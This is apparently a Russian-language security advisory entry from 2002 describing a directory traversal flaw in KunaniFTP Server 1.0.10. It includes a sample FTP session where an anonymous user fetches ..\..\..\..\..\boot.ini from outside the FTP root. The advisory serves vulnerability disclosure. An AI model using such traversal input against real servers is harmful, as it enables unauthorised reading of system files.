Доступ к произвольным файлам в KunaniFTP Server
| Дата публикации: | 15.12.2002 |
| Всего просмотров: | 901 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | KunaniFTP-Server (www.kunani.com) – FTP сервер для windows систем. Некоторые FTP команды позволяют обойти основной каталог и получить доступ к файлам вне ftp root . Пример: ###################################################### Verbindung mit server. 220 Kunani FTP Server Ready ( www.kunani.com ) Benutzer (server:(none)): anonymous 331 Password required for anonymous. Kennwort: billsucks 230 User anonymous logged in. Ftp> get ..\..\..\..\..\boot.ini 200 PORT command successful 150 Opening ASCII mode data connection for /bin/ls. 226 Transfer complete. Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek. #####################################################Уязвимость обнаружена в KunaniFTP-Server v.1.0.10 |
| Ссылки: | Источник |